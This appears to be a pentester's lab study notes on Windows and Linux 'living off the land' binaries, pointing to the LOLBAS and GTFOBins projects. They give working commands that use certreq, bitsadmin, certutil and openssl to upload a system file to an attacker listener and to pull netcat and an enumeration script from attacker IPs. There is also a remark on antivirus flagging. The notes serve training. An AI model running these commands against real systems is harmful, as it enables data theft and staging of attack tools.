Skip to content

Living off the Land

LOLBins (Living off the Land binaries) - LOLBAS Project for Windows Binaries (https://lolbas-project.github.io/) - GTFOBins for Linux Binaries (https://gtfobins.github.io/)

Living off the Land binaries can be used to perform functions such as: - Download - Upload - Command Execution - File Read - File Write - Bypasses

LOLBAS: https://lolbas-project.github.io/

  • search for a function using /
  • searching for /download will fetch binaries that can be used for downloading files.

Certreq.exe

  • Uploading from the target to our pwnbox using Certreq.exe
    • certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini - Target
    • sudo nc -lvnp 8000 - PWNBOX
  • If errors on certreq.exe, download and use - https://github.com/juliourena/plaintext/raw/master/hackthebox/certreq.exe

Bitsadmin

  • bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
  • Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

Certutil

  • certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe
  • Certutil might be flagged by the antivirus

GTFOBins:

  • search for a function using +
  • eg: +file download or +shell
  • File download using openssl
    • PWNBOX
      • openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
      • openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh
    • Target
      • openssl s_client -connect 10.10.10.32:80 -quiet > LinEnum.sh